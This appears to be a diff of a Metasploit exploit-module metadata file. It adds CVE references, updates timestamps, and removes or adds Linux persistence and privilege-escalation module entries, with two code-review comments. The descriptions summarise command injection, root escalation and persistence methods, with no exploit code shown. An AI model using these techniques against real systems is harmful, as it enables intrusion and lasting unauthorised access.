"description": "This module exploits a vulnerability in Openfiler v2.x\n which could be abused to allow authenticated users to execute arbitrary\n code under the context of the 'openfiler' user. The 'system.html' file\n uses user controlled data from the 'device' parameter to create a new\n 'NetworkCard' object. The class constructor in 'network.inc' calls exec()\n with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without\n providing a system password.",
"references": [
"CVE-2012-10040",
"BID-55490",
"URL-http://web.archive.org/web/20210922060411/https://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/",
"OSVDB-93881",
@@ -80366,7 +80920,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/openfiler_networkcard_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/openfiler_networkcard_exec",
@@ -81074,7 +81628,9 @@
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.\n It will leverage an unauthenticated command injection in the Anyterm service on\n port 8023/TCP. Commands are executed as the user \"pandora\". In Pandora FMS 4.1 and 5.0RC1\n the user \"artica\" is not assigned a password by default, which makes it possible to su\n to this user from the \"pandora\" user. The \"artica\" user has access to sudo without a\n password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0\n and lower force a password for the \"artica\" user during installation.",
"references": [],
"references": [
"CVE-2014-125124"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8023,
@@ -81096,7 +81652,7 @@
"targets": [
"Pandora 5.0RC1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/pandora_fms_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_fms_exec",
@@ -81130,6 +81686,7 @@
],
"description": "This module attempts to exploit multiple issues in order to gain remote\n code execution under Pandora FMS version <= 5.0 SP2. First, an attempt\n to authenticate using default credentials is performed. If this method\n fails, a SQL injection vulnerability is leveraged in order to extract\n the \"Auto Login\" password hash. If this value is not set, the module\n will then extract the administrator account's MD5 password hash.",
"references": [
"CVE-2014-125115",
"URL-http://pandorafms.com/downloads/whats_new_5-SP3.pdf",
"URL-http://blog.pandorafms.org/?p=2041"
],
@@ -81154,7 +81711,7 @@
"targets": [
"Pandora FMS version <= 5.0 SP2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/pandora_fms_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_fms_sqli",
@@ -81246,7 +81803,9 @@
"Onur ER <onur@onurer.net>"
],
"description": "This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.\n net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.",
"references": [],
"references": [
"CVE-2025-34088"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 80,
@@ -81268,7 +81827,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2023-02-10 18:04:31 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/pandora_ping_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_ping_cmd_exec",
@@ -82696,6 +83255,7 @@
],
"description": "Different Raidsonic NAS devices are vulnerable to OS command injection via the web\n interface. The vulnerability exists in timeHandler.cgi, which is accessible without\n authentication. This module has been tested with the versions IB-NAS5220 and\n IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon\n configuration, this module is set to ManualRanking and could cause target instability.",
"references": [
"CVE-2013-10049",
"OSVDB-90221",
"EDB-24499",
"BID-57958",
@@ -82722,7 +83282,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/raidsonic_nas_ib5220_exec_noauth",
@@ -83121,6 +83681,7 @@
],
"description": "This module allows an attacker with a privileged rConfig account to start a reverse shell\n due to an arbitrary file upload vulnerability in `/lib/crud/vendors.crud.php`.\n Then, the uploaded payload can be triggered by a call to `images/vendor/<payload_file>.php`",
"references": [
"CVE-2022-44384",
"EDB-49665",
"EDB-49783"
],
@@ -83145,7 +83706,7 @@
"targets": [
"rConfig <= 3.9.6"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/rconfig_vendors_auth_file_upload_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/rconfig_vendors_auth_file_upload_rce",
@@ -83240,6 +83801,7 @@
],
"description": "This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress\n virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form\n can be exploited to add a malicious user into the application's database. An attacker can then exploit a\n command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure\n configuration of the sudoers file can be abused to escalate privileges to root.",
"references": [
"CVE-2025-34112",
"URL-http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf"
],
"platform": "Linux",
@@ -83263,7 +83825,7 @@
"targets": [
"Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/riverbed_netprofiler_netexpress_exec",
@@ -85123,7 +85685,8 @@
"CVE-2022-24989",
"URL-https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/",
"URL-https://github.com/0xf4n9x/CVE-2022-24990",
"URL-https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990"
"URL-https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990",
"ATT&CK-T1003"
],
"platform": "Linux,Unix",
"arch": "cmd, x64, x86, aarch64",
@@ -85147,7 +85710,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-06-12 19:28:08 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb",
"is_install_path": true,
"ref_name": "linux/http/terramaster_unauth_rce_cve_2022_24990",
@@ -85182,6 +85745,7 @@
],
"description": "Tiki-Wiki CMS's calendar module contains a remote code execution\n vulnerability within the viewmode GET parameter.\n The calendar module is NOT enabled by default. If enabled,\n the default permissions are set to NOT allow anonymous users\n to access.\n\n Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14\n Verified/Tested against 14.1",
"references": [
"CVE-2025-34113",
"EDB-39965",
"URL-https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki"
],
@@ -85206,7 +85770,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/tiki_calendar_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/tiki_calendar_exec",
@@ -85603,6 +86167,9 @@
],
"description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product\n have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which\n leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.",
"references": [
"CVE-2017-7896",
"CVE-2017-11392",
"CVE-2017-11391",
"URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/"
],
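Review bot: CVE-2017-11392 is listed ahead of CVE-2017-11391 on trendmicro_imsva_widget_exec; keep the three IDs in ascending order, and since the description names three separate weaknesses (the exposed diagnostic.log leaking a JSESSIONID, the authentication bypass that results, and the Proxy.php command injection under the TMCSS folder), a short mapping of which CVE covers which step belongs in the module documentation so that CVE-2017-7896, the outlier in the set, can be checked against ZDI-17-521.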
@@ -85627,7 +86194,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-07 14:03:32 +0000",
"path": "/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/trendmicro_imsva_widget_exec",
@@ -85959,6 +86526,7 @@
],
"description": "This module exploits a pre-auth file upload to install a new root user\n to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.\n\n FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.\n /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.\n\n This method is used by the \"mf\" malware infecting these devices.",
"references": [
"CVE-2015-9266",
"EDB-39701",
"URL-https://hackerone.com/reports/73480"
],
@@ -85983,7 +86551,7 @@
"targets": [
"Ubiquiti airOS < 5.6.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/ubiquiti_airos_file_upload",
@@ -86962,6 +87530,7 @@
],
"description": "This module exploits a command execution vulnerability in WAN Emulator\n version 2.3 which can be abused to allow unauthenticated users to execute\n arbitrary commands under the context of the 'www-data' user.\n The 'result.php' script calls shell_exec() with user controlled data\n from the 'pc' parameter. This module also exploits a command execution\n vulnerability to gain root privileges. The 'dosu' binary is suid 'root'\n and vulnerable to command execution in argument one.",
"references": [
"CVE-2012-10041",
"OSVDB-85344",
"OSVDB-85345"
],
@@ -86986,7 +87555,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/wanem_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/wanem_exec",
@@ -87325,6 +87894,7 @@
],
"description": "This module exploits a vulnerability found in WeBid version 1.0.2.\n By abusing the converter.php file, a malicious user can inject PHP code\n in the includes/currencies.php script without any authentication, which\n results in arbitrary code execution.",
"references": [
"CVE-2011-10011",
"OSVDB-73609",
"EDB-17487",
"URL-http://web.archive.org/web/20230206230259/http://www.webidsupport.com/forums/showthread.php?3892"
@@ -87350,7 +87920,7 @@
"targets": [
"WeBid 1.0.2 / Ubuntu"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/webid_converter.rb",
"is_install_path": true,
"ref_name": "linux/http/webid_converter",
@@ -87685,6 +88255,7 @@
],
"description": "This module exploits a command injection vulnerability in an undocumented\n CGI file in several versions of the WePresent WiPG-1000 devices.\n Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.",
"references": [
"CVE-2025-34103",
"URL-https://www.redguard.ch/advisories/wepresent-wipg1000.txt"
],
"platform": "Unix",
@@ -87708,7 +88279,7 @@
"targets": [
"WiPG-1000 <=2.0.0.7"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/wipg1000_cmd_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/wipg1000_cmd_injection",
@@ -87915,6 +88486,7 @@
],
"description": "This module exploits a vulnerability in ZEN Load Balancer\n version 2.0 and 3.0-rc1 which could be abused to allow authenticated users\n to execute arbitrary code under the context of the 'root' user.\n The 'content2-2.cgi' file uses user controlled data from the 'filelog'\n parameter within backticks.",
"references": [
"CVE-2012-10039",
"OSVDB-85654",
"URL-http://web.archive.org/web/20221203195056/https://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/"
],
@@ -87939,7 +88511,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/zen_load_balancer_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/zen_load_balancer_exec",
@@ -87972,6 +88544,7 @@
],
"description": "This module exploits a command execution vulnerability in Zenoss 3.x\n which could be abused to allow authenticated users to execute arbitrary\n code under the context of the 'zenoss' user. The show_daemon_xml_configs()\n function in the 'ZenossInfo.py' script calls Popen() with user\n controlled data from the 'daemon' parameter.",
"references": [
"CVE-2012-10048",
"URL-http://web.archive.org/web/20221203180334/https://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/",
"OSVDB-84408"
],
@@ -87996,7 +88569,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
@@ -88939,51 +89512,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/apt_package_manager_persistence": {
"name": "APT Package Manager Persistence",
"fullname": "exploit/linux/local/apt_package_manager_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "1999-03-09",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the package manager is used. No\n handler is ran automatically so you must configure an appropriate\n exploit/multi/handler to connect. This module creates a pre-invoke hook\n for APT in apt.conf.d. The hook name syntax is numeric followed by text.",
"references": [],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/apt_package_manager_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/asan_suid_executable_priv_esc": {
"name": "AddressSanitizer (ASan) SUID Executable Privilege Escalation",
"fullname": "exploit/linux/local/asan_suid_executable_priv_esc",
@@ -89039,51 +89567,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/autostart_persistence": {
"name": "Autostart Desktop Item Persistence",
"fullname": "exploit/linux/local/autostart_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "2006-02-13",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will create an autostart entry to execute a payload.\n The payload will be executed when the users logs in.",
"references": [],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/linux/local/autostart_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/autostart_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
"name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
"fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -89283,6 +89766,7 @@
],
"description": "This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The\n runrshell binary is meant to execute a shell script as root, but can be abused to inject\n extra commands in the argument, allowing you to execute anything as root.",
"references": [
"CVE-2018-15439",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56"
],
"platform": "Linux",
@@ -89293,7 +89777,7 @@
"targets": [
"Cisco Prime Infrastructure 3.4.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/cpi_runrshell_priv_esc",
@@ -89318,50 +89802,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/cron_persistence": {
"name": "Cron Persistence",
"fullname": "exploit/linux/local/cron_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "1979-07-01",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will create a cron or crontab entry to execute a payload.\n The module includes the ability to automatically clean up those entries to prevent multiple executions.\n syslog will get a copy of the cron entry.",
"references": [],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Cron",
"User Crontab",
"System Crontab"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/linux/local/cron_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/cron_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe": {
"name": "Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE",
"fullname": "exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe",
@@ -89837,54 +90277,6 @@
"needs_cleanup": null,
"actions": []
},
"exploit_linux/local/diamorphine_rootkit_signal_priv_esc": {
"name": "Diamorphine Rootkit Signal Privilege Escalation",
"fullname": "exploit/linux/local/diamorphine_rootkit_signal_priv_esc",
"aliases": [],
"rank": 600,
"disclosure_date": "2013-11-07",
"type": "exploit",
"author": [
"m0nad",
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses Diamorphine rootkit's privesc feature using signal\n 64 to elevate the privileges of arbitrary processes to UID 0 (root).\n\n This module has been tested successfully with Diamorphine from `master`\n branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).",
"references": [
"URL-https://github.com/m0nad/Diamorphine"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Auto"
],
"mod_time": "2025-06-25 09:25:53 +0000",
"path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/docker_cgroup_escape": {
"name": "Docker cgroups Container Escape",
"fullname": "exploit/linux/local/docker_cgroup_escape",
@@ -90698,6 +91090,7 @@
],
"description": "Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as\n lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,\n Apache by default on CentOS 5.8, the operating system supported by Kloxo.\n This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.",
"references": [
"CVE-2012-10022",
"EDB-25406",
"OSVDB-93287",
"URL-http://roothackers.net/showthread.php?tid=92"
@@ -90710,7 +91103,7 @@
"targets": [
"Kloxo 6.1.12"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/local/kloxo_lxsuexec.rb",
"is_install_path": true,
"ref_name": "linux/local/kloxo_lxsuexec",
@@ -90798,6 +91191,7 @@
],
"description": "This module attempts to gain root privileges on Deepin Linux systems\n by using lastore-daemon to install a package.\n\n The lastore-daemon D-Bus configuration on Deepin Linux permits any\n user in the sudo group to install arbitrary system packages without\n providing a password, resulting in code execution as root. By default,\n the first user created on the system is a member of the sudo group.\n\n This module has been tested successfully with lastore-daemon versions\n 0.9.53-1 on Deepin Linux 15.5 (x64); and\n 0.9.66-1 on Deepin Linux 15.7 (x64).",
"references": [
"CVE-2016-15045",
"EDB-39433",
"URL-https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8"
],
@@ -90809,7 +91203,7 @@
"targets": [
"Auto"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
@@ -90891,51 +91285,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/motd_persistence": {
"name": "update-motd.d Persistence",
"fullname": "exploit/linux/local/motd_persistence",
"aliases": [],
"rank": 300,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Julien Voisin"
],
"description": "This module will add a script in /etc/update-motd.d/ in order to persist a payload.\n The payload will be executed with root privileges everytime a user logs in.",
"references": [
"URL-https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2024-09-11 13:30:09 +0000",
"path": "/modules/exploits/linux/local/motd_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/motd_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [],
"Reliability": [
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_linux/local/ndsudo_cve_2024_32019": {
"name": "Netdata ndsudo privilege escalation",
"fullname": "exploit/linux/local/ndsudo_cve_2024_32019",
@@ -91586,6 +91935,7 @@
],
"description": "This module abuses a feature of the sudo command on Progress Flowmon.\n Certain binary files are allowed to automatically elevate\n with the sudo command. This is based off of the file name. This\n includes executing a PHP command with a specific file name. If the\n file is overwritten with PHP code it can be used to elevate privileges\n to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.",
"references": [
"CVE-2024-2389",
"URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
"URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
],
@@ -91597,7 +91947,7 @@
"targets": [
"Automatic"
],
"mod_time": "2024-05-29 08:39:06 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb",
"is_install_path": true,
"ref_name": "linux/local/progress_flowmon_sudo_privesc_2024",
@@ -91636,6 +91986,7 @@
],
"description": "This module abuses a feature of the sudo command on Progress Kemp\n LoadMaster. Certain binary files are allowed to automatically elevate\n with the sudo command. This is based off of the file name. Some files\n have this permission are not write-protected from the default 'bal' user.\n As such, if the file is overwritten with an arbitrary file, it will still\n auto-elevate. This module overwrites the /bin/loadkeys file with another\n executable.",
"references": [
"CVE-2024-1212",
"URL-https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/",
"URL-https://kemptechnologies.com/kemp-load-balancers"
],
@@ -91648,7 +91999,7 @@
"Dropper",
"Command"
],
"mod_time": "2025-02-20 08:19:23 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb",
"is_install_path": true,
"ref_name": "linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
@@ -91782,51 +92133,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/rc_local_persistence": {
"name": "rc.local Persistence",
"fullname": "exploit/linux/local/rc_local_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "1980-10-01",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will edit /etc/rc.local in order to persist a payload.\n The payload will be executed on the next reboot.",
"references": [],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/linux/local/rc_local_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/rc_local_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc": {
"name": "Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation",
"fullname": "exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
@@ -92048,6 +92354,62 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/rootkit_privesc_signal_hunter": {
"name": "Rootkit Privilege Escalation Signal Hunter",
"fullname": "exploit/linux/local/rootkit_privesc_signal_hunter",
"aliases": [
"exploit/linux/local/diamorphine_rootkit_signal_priv_esc"
],
"rank": 500,
"disclosure_date": "2013-11-07",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module searches for rootkits which use signals to elevate\n process privileges to UID 0 (root).\n\n Some rootkits install signal handlers which listen for specific\n signals to elevate process privileges. This module identifies these\n rootkits by sending signals and observing UID switching to root.\n\n This module has been tested successfully with:\n\n Singularity 5b6c4b6 (2025-10-19) on Ubuntu 24.04\n kernel 6.14.0-33-generic (x64);\n Diamorphine 2337293 (2023-09-20) on Ubuntu 22.04\n kernel 5.19.0-38-generic (x64);\n Codeine 9644336 (2025-09-02) on Ubuntu 22.04\n kernel 5.19.0-38-generic (x64).",
"references": [
"URL-https://github.com/bcoles/rootkit-signal-hunter",
"URL-https://xcellerator.github.io/posts/linux_rootkits_03/",
"URL-https://github.com/m0nad/Diamorphine",
"URL-https://github.com/h3xduck/Umbra",
"URL-https://github.com/diego-tella/Codeine",
"URL-https://github.com/MatheuZSecurity/Singularity",
"URL-https://github.com/Asekon/RootKit"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, riscv64le, riscv32le, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Auto"
],
"mod_time": "2025-10-31 17:22:19 +0000",
"path": "/modules/exploits/linux/local/rootkit_privesc_signal_hunter.rb",
"is_install_path": true,
"ref_name": "linux/local/rootkit_privesc_signal_hunter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-os-down"
],
"SideEffects": [
"artifacts-on-disk",
"screen-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/runc_cwd_priv_esc": {
"name": "runc (docker) File Descriptor Leak Privilege Escalation",
"fullname": "exploit/linux/local/runc_cwd_priv_esc",
@@ -92152,56 +92514,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/service_persistence": {
"name": "Service Persistence",
"fullname": "exploit/linux/local/service_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "1983-01-01",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Cale Black"
],
"description": "This module will create a service on the box, and mark it for auto-restart.\n We need enough access to write service files and potentially restart services\n Targets:\n System V:\n CentOS <= 5\n Debian <= 6\n Kali 2.0\n Ubuntu <= 9.04\n Upstart:\n CentOS 6\n Fedora >= 9, < 15\n Ubuntu >= 9.10, <= 14.10\n systemd:\n CentOS 7\n Debian >= 7, <=8\n Fedora >= 15\n Ubuntu >= 15.04\n Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.",
"references": [
"URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Auto",
"System V",
"Upstart",
"openrc",
"systemd",
"systemd user"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/linux/local/service_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/service_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/servu_ftp_server_prepareinstallation_priv_esc": {
"name": "Serv-U FTP Server prepareinstallation Privilege Escalation",
"fullname": "exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc",
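Review bot: deleting exploit/linux/local/service_persistence also deletes its "Auto" and "openrc" targets, and with them the one place that chose the init system before writing a service file; the per-init replacements added elsewhere in this diff each cover a single init system and leave that choice to the operator. Either keep a thin auto-selecting module under the old path or make each replacement's check confirm that its init system is actually present on the target (the removed entry had "check": false, so that gap predates this change, but the split is the moment to close it).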
@@ -93436,51 +93748,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/yum_package_manager_persistence": {
"name": "Yum Package Manager Persistence",
"fullname": "exploit/linux/local/yum_package_manager_persistence",
"aliases": [],
